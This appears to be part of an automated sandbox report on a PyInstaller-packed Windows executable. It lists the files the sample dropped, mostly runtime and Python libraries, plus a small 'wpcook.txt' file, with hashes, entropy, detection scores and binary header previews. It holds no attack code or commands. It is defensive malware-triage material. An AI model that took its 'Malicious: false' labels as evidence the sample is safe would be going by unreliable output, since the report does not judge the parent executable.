Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....n.p.........." .........................................................0......hD....`.......................................................... ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-locale-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12664
Entropy (8bit):	6.751351213617713
Encrypted:	false
SSDEEP:	192:WkWfhWGWULwu0Sc2HnhWgN7asWCaXcA5E8qnajlsEa:WkWfhWYD/HRN7sXx5E8lmh
MD5:	995B8129957CDE9563CEE58F0CE3C846
SHA1:	06E4AB894B8FA6C872438870FB8BD19DFDC12505
SHA-256:	7DC931F1A2DC7B6E7BD6E7ADA99D7FADC2A65EBF8C8EA68F607A3917AC7B4D35
SHA-512:	3C6F8E126B92BEFCAEFF64EE7B9CDA7E99EE140BC276AD25529191659D3C5E4C638334D4CC2C2FB495C807E1F09C3867B57A7E6BF7A91782C1C7E7B8B5B1B3D9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................." .........................................................0......5.....`.............................................e............ ..................x#..............T............................................................................rdata..u...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-math-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	21392
Entropy (8bit):	6.265710172010036
Encrypted:	false
SSDEEP:	384:WjQUbM4Oe59Ckb1hgmLVWfhWoLD/HRN74CXlOnM:yRMq59Bb1jyxLDv4C+M
MD5:	05461408D476053D59AF729CEBD88F80
SHA1:	B8182CAB7EC144447DD10CBB2488961384B1118B
SHA-256:	A2C8D0513CAD34DF6209356AEAE25B91CF74A2B4F79938788F56B93EBCE687D9
SHA-512:	C2C32225ABB0EB2EA0DA1FA38A31EF2874E8F8DDCA35BE8D4298F5D995EE3275CF9463E9F76E10EAE67F89713E5929A653AF21140CEE5C2A96503E9D95333A9C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...Q............." .........,...............................................P.......J....`..............................................%...........@...............0...#..............T............................................................................rdata...&.......(..................@..@.rsrc........@.......,..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-process-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13192
Entropy (8bit):	6.658310748695235
Encrypted:	false
SSDEEP:	192:WqRQqjd7xWfhWm6WULwu0Sc2HnhWgN7asWSipXZL1aqnajKsCCtS:WqKAWfhWPD/HRN7WXSlGsCR
MD5:	4B7D7BFDC40B2D819A8B80F20791AF6A
SHA1:	5DDD1720D1C748F5D7B2AE235BCE10AF1785E6A5
SHA-256:	EEE66F709EA126E292019101C571A008FFCA99D13E3C0537BB52223D70BE2EF3
SHA-512:	357C7C345BDA8750FFE206E5AF0A0985B56747BE957B452030F17893E3346DAF422080F1215D3A1EB7C8B2EF97A4472DCF89464080C92C4E874524C6F0A260DB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....-.........." .........................................................0............`.............................................x............ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-runtime-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	16776
Entropy (8bit):	6.511642894789643
Encrypted:	false
SSDEEP:	192:W8PtIPrpJhhf4AN5/KilWfhWjWULwu0Sc2HnhWgN7asWPhIzLMmDWqnajKs76+3R:W8PtYr7LWfhWhD/HRN7+EQmDWlGs76ER
MD5:	1495FB3EFBD22F589F954FEC982DC181
SHA1:	4337608A36318F624268A2888B2B1BE9F5162BC6
SHA-256:	BB3EDF0ECDF1B700F1D3B5A3F089F28B4433D9701D714FF438B936924E4F8526
SHA-512:	45694B2D4E446CADCB19B3FDCB303D5C661165ED93FD0869144D699061CCE94D358CD5F56BD5DECDE33D886BA23BF958704C87E07AE2EA3AF53034C2AD4EEEF9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...K............" .........................................................@......'.....`.............................................4............0...................#..............T............................................................................rdata..D...........................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-stdio-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18320
Entropy (8bit):	6.4523064815605045
Encrypted:	false
SSDEEP:	192:WdgnLpHquWYFxEpahXWfhWo4/WULwu0Sc2HnhWgN7a8WWih/Ok9qnajMDk2R:WUZpFVhXWfhWo4tD/HRN7mhlQDkC
MD5:	50C4A43BE99C732CD9265BCBBCD2F6A2
SHA1:	190931DAE304C2FCB63394EBA226E8C100D7B5FD
SHA-256:	AE6C2E946B4DCDF528064526B5A2280EE5FA5228F7BB6271C234422E2B0E96DD
SHA-512:	2B134F0E6C94E476F808D7ED5F6B5DED76F32AC45491640B2754859265B6869832E09CDBE27774DE88AAB966FAE6F22219CC6B4AFAA33A911B3CE42B42DBE75A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...U.x..........." ......... ...............................................@.......6....`.............................................a............0...............$...#..............T............................................................................rdata..a...........................@..@.rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-string-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18320
Entropy (8bit):	6.442354238527744
Encrypted:	false
SSDEEP:	384:WyiFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlTWfhWoLD/HRN74o6hlQDk0:Z6S5yguNvZ5VQgx3SbwA71IkFDxLDv4K
MD5:	9B3F816D29B5304388E21DD99BEBAA7D
SHA1:	1B3F2D34C71F1877630376462DC638085584F41B
SHA-256:	07A5CBA122B1100A1B882C44AC5FFDD8FB03604964ADDF65D730948DEAA831C5
SHA-512:	687F692F188DAD50CD6B90AC67ED15B67D61025B79D82DFF21FF00A45DDC5118F1E0CDC9C4D8E15E6634ED973490718871C5B4CC3047752DEDE5EBDABF0B3C89
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...<.L..........." ......... ...............................................@.......l....`..........................................................0...............$...#..............T............................................................................rdata..............................@..@.rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-time-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14728
Entropy (8bit):	6.599830773843352
Encrypted:	false
SSDEEP:	192:W3JD2WfhWv6WULwu0Sc2HnhWgN7aIWof8XEKup3JdqnajKsX55qg9:W3cWfhWvsD/HRN7SX7aJdlGsXl
MD5:	2774D3550B93BA9CBCA42D3B6BB874BD
SHA1:	3FA1FC7D8504199D0F214CCEF2FCFF69B920040F
SHA-256:	90017928A8A1559745C6790BC40BB6EBC19C5F8CDD130BAC9332C769BC280C64
SHA-512:	709F16605A2014DB54D00D5C7A3EF67DB12439FCE3AB555EA524115AAE5BA5BF2D66B948E46A01E8DDBE3AC6A30C356E1042653ED78A1151366C37BFBAF7B4C0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....n..........." .........................................................0...........`.......................................................... ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-utility-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12688
Entropy (8bit):	6.743408491526782
Encrypted:	false
SSDEEP:	192:WWfHQdujWfhWoiWULwu0Sc2HnhWgN7a8W+UzWQfvXqnajan51L8:WWf9WfhWoUD/HRN7CSWXlOnn8
MD5:	969DAA50C4EF3BD2A8C1D9B2C452F541
SHA1:	3D36A074C3171AD9A3CC4AD22E0E820DB6DB71B4
SHA-256:	B1CFF7F4AAB3303AEC4E95EE7E3C7906C5E4F6062A199C83241E9681C5FCAA74
SHA-512:	41B5A23EA78B056F27BFDAF67A0DE633DE408F458554F747B3DD3FB8D6C33419C493C9BA257475A0CA45180FDF57AF3D00E6A4FDCD701D6ED36EE3D473E9BDAC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................." .........................................................0............`.............................................^............ ...................#..............T............................................................................rdata..n...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1066192
Entropy (8bit):	5.671318536981899
Encrypted:	false
SSDEEP:	12288:oEHYKmhcWyBC6SOIE/8A4a2Y4EdOVwx/fpEWerzku+E0SLMNb:oEHYYVBcLa21FVwx/fpEWe8u+E/MNb
MD5:	880E16B2487C1A867A74D5125E480FB2
SHA1:	A252769881EF56D2D031C2A437E29D6D21FFC9C0
SHA-256:	E61782029EDD46A7F44F812E521F8406558F6B8647D743D14535888F589BABCD
SHA-512:	71E4E0CDD1579E2E85D95B3D8727C5781DF5BB07CB8BC8B381B4D790978C6707C8FFD85E7CD18790C3602B126CCFF7617C6797B404230C77EAC8AFDF5B914CA3
Malicious:	false
Preview:	PK..........!.8..............._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Ze..Ze.e..Z+e.,....[d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d..de8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF

C:\Users\user\AppData\Local\Temp\_MEI52202\certifi\cacert.pem

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	286370
Entropy (8bit):	6.049534888796494
Encrypted:	false
SSDEEP:	6144:QW1H/M8f9R0mNplkXCRrwADwYCuMEigT/Q5MSRqNb7d8N:QWN/vRLNLWCRrBC5MWavdA
MD5:	7ADBCC03E8C4F261C08DB67930EC6FDD
SHA1:	EDC6158964ACC5999ED5413575DD9A650A6BCDB2
SHA-256:	DE5F02716B7FA8BE36D37D2B1A2783DD22EE7C80855F46D8B4684397F11754F2
SHA-512:	58299ED51D66A801E2927D13C4304B7020EAC80982559C7B898C46909D0BC902EB13FEA501BD600C8C19739736289342BAE227510C85702B7F04BD80D5A9C723
Malicious:	false
Preview:	.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

C:\Users\user\AppData\Local\Temp\_MEI52202\libcrypto-1_1.dll

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3441504
Entropy (8bit):	6.097985120800337
Encrypted:	false
SSDEEP:	49152:8TKuk2CQIU6iV9OjPWgBqIVRIaEv5LY/RnQ2ETEvrPnkbsYNPsNwsML1CPwDv3u6:Vv+KRi5KsEKsY+NwsG1CPwDv3uFfJu
MD5:	6F4B8EB45A965372156086201207C81F
SHA1:	8278F9539463F0A45009287F0516098CB7A15406
SHA-256:	976CE72EFD0A8AEEB6E21AD441AA9138434314EA07F777432205947CDB149541
SHA-512:	2C5C54842ABA9C82FB9E7594AE9E264AC3CBDC2CC1CD22263E9D77479B93636799D0F28235AC79937070E40B04A097C3EA3B7E0CD4376A95ED8CA90245B7891F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a...2...2...2...2...2..3...2..3...2..3...2..3...2...2...2L.3...2..3...2..3.2..3...2..p2...2..3...2Rich...2........................PE..d...m..b.........." ... ..$...................................................4....../5...`..........................................h/..h...*4.@....`4.\|....`2.....Z4.`)...p4..O....,.8...........................`.,.@............ 4..............................text.....$.......$................. ..`.rdata........$.......$.............@..@.data...!z....1..,....1.............@....pdata.......`2.......1.............@..@.idata..^#... 4..$....3.............@..@.00cfg..u....P4.......3.............@..@.rsrc...\|....`4.......3.............@..@.reloc...x...p4..z....3.............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52202\libffi-7.dll

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	32792
Entropy (8bit):	6.3566777719925565
Encrypted:	false
SSDEEP:	384:2nypDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYIoBneEAR8:2l0Vn5Q28J8qsqMttktDxOpWDG4yKRF
MD5:	EEF7981412BE8EA459064D3090F4B3AA
SHA1:	C60DA4830CE27AFC234B3C3014C583F7F0A5A925
SHA-256:	F60DD9F2FCBD495674DFC1555EFFB710EB081FC7D4CAE5FA58C438AB50405081
SHA-512:	DC9FF4202F74A13CA9949A123DFF4C0223DA969F49E9348FEAF93DA4470F7BE82CFA1D392566EAAA836D77DDE7193FED15A8395509F72A0E9F97C66C0A096016
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....F...$.......I....................................................`..........................................j.......m..P....................f...............b...............................b...............`.. ............................text....D.......F.................. ..`.rdata..H....`.......J..............@..@.data................^..............@....pdata...............`..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52202\libssl-1_1.dll

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	702816
Entropy (8bit):	5.547832370836076
Encrypted:	false
SSDEEP:	12288:UUnBMlBGdU/t0voUYHgqRJd7a7+JLvrfX7bOI8Fp0D6WuHU2lvzR:UN/t0vMnffOI8Fp0D6TU2lvzR
MD5:	8769ADAFCA3A6FC6EF26F01FD31AFA84
SHA1:	38BAEF74BDD2E941CCD321F91BFD49DACC6A3CB6
SHA-256:	2AEBB73530D21A2273692A5A3D57235B770DAF1C35F60C74E01754A5DAC05071
SHA-512:	FAC22F1A2FFBFB4789BDEED476C8DAF42547D40EFE3E11B41FADBC4445BB7CA77675A31B5337DF55FDEB4D2739E0FB2CBCAC2FEABFD4CD48201F8AE50A9BD90B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.p..p..p......p...+..p.\.+..p.../..p......p...)..p...+..p..p+.iq......p.....p.....p...(..p.Rich.p*.........PE..d......b.........." ... .B...T......<.....................................................`.........................................@A...N..@U..........s........M......`)......h...0...8...............................@............@..@............................text....@.......B.................. ..`.rdata..J/...`...0...F..............@..@.data...AM.......D...v..............@....pdata...V.......X..................@..@.idata..%W...@...X..................@..@.00cfg..u............j..............@..@.rsrc...s............l..............@..@.reloc..l............t..............@..B................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52202\python310.dll

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4492160
Entropy (8bit):	6.462556573356975
Encrypted:	false
SSDEEP:	49152:+xWM30WEuKdhbvd9aCLYjiNME9KnPdZkAMnu08M2c3MrOEJ8wwoJCzSy4I0mUHJq:+eV7bkwMVPZRHqzt0XHaMZqSH1jze
MD5:	54F8267C6C116D7240F8E8CD3B241CD9
SHA1:	907B965B6CE502DAD59CDE70E486EB28C5517B42
SHA-256:	C30589187BE320BC8E65177AEB8DC1D39957F7B7DCDA4C13524DD7F436FB0948
SHA-512:	F6C865C8276FE1A1A0F3267B89FB6745A3FC82972032280DCE8869006FEB2B168516E017241A0C82BDAE0F321FAB388523691769F09A502FC3BD530C1C4CACF1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q.D...........+.........../...........)............+......+.H...'................(....Rich..*.........................PE..d...2.Ec.........." ...!..#...!.....\.........................................E.....`TE...`......................................... ?=.......>.\|.....E.......B.X....bD..)....E..t.. B%.T............................@%.@.............#.8............................text.....#.......#................. ..`.rdata..ld....#..f....#.............@..@.data........0>.......>.............@....pdata..X.....B.. ....A.............@..@PyRuntim`.....D.......C.............@....rsrc.........E.......C.............@..@.reloc...t....E..v....C.............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52202\select.pyd

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29056
Entropy (8bit):	6.47967305294288
Encrypted:	false
SSDEEP:	768:KeS+FwhCwHq7mI5I47GZYiSyvd87PxWEY:KeS+ahHK7mI5I47GZ7SyV87Px
MD5:	A7863648B3839BFE2D5F7C450B108545
SHA1:	10078D8EDB2C46A2E74EC7680D2DB293ACC5731C
SHA-256:	8B4B5D37B829BA885281134D9948F249E0ECD553AE72DEDA6A404619FDF4CCC5
SHA-512:	A709865709ABE0C39D68E2CED4AA4387CD173EA9AA0A04C9794733B5BF3584D50256A9F756FEE1DEC144A9D724B028264763196EEB7B89AB2697FF26D83DB843
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.t^_d'^_d'^_d'W'.'\_d'.$e&\_d'.$a&R_d'.$`&V_d'.$g&Z_d'.$e&\_d'^_e'._d'.-e&[_d'.$i&__d'.$d&__d'.$.'__d'.$f&__d'Rich^_d'........................PE..d...C.Ec.........." ...!.....2............................................................`..........................................@..L....@..x....p.......`.......H...)......L....3..T............................2..@............0...............................text............................... ..`.rdata..H....0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52202\sqlite3.dll

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1445752
Entropy (8bit):	6.579514536463233
Encrypted:	false
SSDEEP:	24576:FU3ZlIdtwk5xK6uEe89TSMfoWncxKqT+Ypd5bLYUe+f6Sb1IZ:/zGWelqcxKI+YpdSb+CuC
MD5:	F2220D34A76303B0C4C115B529153968
SHA1:	1FEDBF72A76E4863F151FE8704B9F03F0091939F
SHA-256:	A24D35883540182D7304FFB9C8342ABE53ED8DA53455E57721C7AE452280B093
SHA-512:	BF7D292F5E503A985D6345A03D3C80B17D61DC31A6CB6AA3555DCAF28C481577DB3606FF9B95EF3AE1F4FD7B9EE03D5316531D43AA9A2EC319DB0FBA9E4F3784
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<T.S]:.S]:.S]:.Z%.._]:..&;.Q]:..&?.^]:..&>.[]:..&9.W]:../;.P]:.S];..]:..&2.R]:..&:.R]:..&.R]:..&8.R]:.RichS]:.........................PE..d...t.Ec.........." ...!............,........................................ ......j.....`..............................................!...................0..........x)......\|...Pg..T............................f..@............ ..(............................text............................... ..`.rdata..D.... ......................@..@.data...0A.......8..................@....pdata.......0......................@..@.rsrc...............................@..@.reloc..\|...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52202\ucrtbase.dll

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1017720
Entropy (8bit):	6.638795525512885
Encrypted:	false
SSDEEP:	24576:ZLyubutYBWSlhrANUDk8ExrmxvSZX0ypFiR+o:dyubJvlhrVETiR+o
MD5:	9679F79D724BCDBD3338824FFE8B00C7
SHA1:	5DED91CC6E3346F689D079594CF3A9BF1200BD61
SHA-256:	962C50AFCB9FBFD0B833E0D2D7C2BA5CB35CD339ECF1C33DDFB349253FF95F36
SHA-512:	74AC8DEB4A30F623AF1E90E594D66FE28A1F86A11519C542C2BAD44E556B2C5E03D41842F34F127F8F7F7CB217A6F357604CB2DC6AA5EDC5CBA8B83673D8B8BD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.Pc.>0.>0.>0#..0..>0.?0..>0O..0+.>0O.>1+.>0O.=1..>0O.;1p.>0O.01..>0O.:1d.>0O..0+.>0O.<1+.>0Rich*.>0........................PE..d....A.0.........." .........b.......6....................................................`A........................................ ...........................H....d..x#......p....y..T............................B...............o...............................text............................... ..`.rdata...w...0...x..................@..@.data....$..........................@....pdata..H...........................@..@.rsrc................R..............@..@.reloc..p............X..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52202\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1121152
Entropy (8bit):	5.384410518948685
Encrypted:	false
SSDEEP:	12288:xcYYMmuZ63NPQCb5Pfhnzr0ql8L8koM7IRG5eeme6VZyrIBHdQLhfFE+uzH:aYYucZV0m8wMMREtV6Vo4uYzH
MD5:	CF1EDA3F804DFA64AC00CAD29AB243E1
SHA1:	3B0F08FA679227FA635490725E17460A9DE8092D
SHA-256:	A3AA957CF891A411A4E22E41AA4053265ECCBA4D47B5ABE6475789EBBA7FCCA0
SHA-512:	1BA213A7E5916FE628D80EFDEADE35DE7DB88CC8118F8AC348DC7F7A7C5977975C9CF63D774136259FC055790EB96644BDE2EE19C044126F1D59D665E4BC8D97
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...l...l...l..\|....l.0.m...l.0.i...l.0.h...l.0.o...l.>.m...l.cvm...l...m...l.>.a...l.>.l...l.>.....l.>.n...l.Rich..l.................PE..d...E.Ec.........." ...!.B...........*.......................................@......$.....`.............................................X...(........ ...................)...0......@b..T............................a..@............`..x............................text....A.......B.................. ..`.rdata......`.......F..............@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\wpcook.txt

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	398
Entropy (8bit):	5.813788723337243
Encrypted:	false
SSDEEP:	12:FW+QzyT8RUS06v8RNwbrVlT8RVwdNJk97u4J/DZD:wUAiS06kHwjAONW97ZJtD
MD5:	965245F4A2FD2C344CA7691E4822356D
SHA1:	5B80E755EB8F31B643B1987CB3DBACB7198DEC65
SHA-256:	319DCF3EF098430BA9A4E468CB0011EFA792BD683D4C229CEB5B4D8220D42ACA
SHA-512:	9CA93730D50AD73E980DA0C61EDD7422DCC145777CC9E615994B11DD9D56CFEFC8EE4660DE1C1C182B8D668A23CF60A3A0FB8731DCAE26EED8DEFDABF585DA6E
Malicious:	false
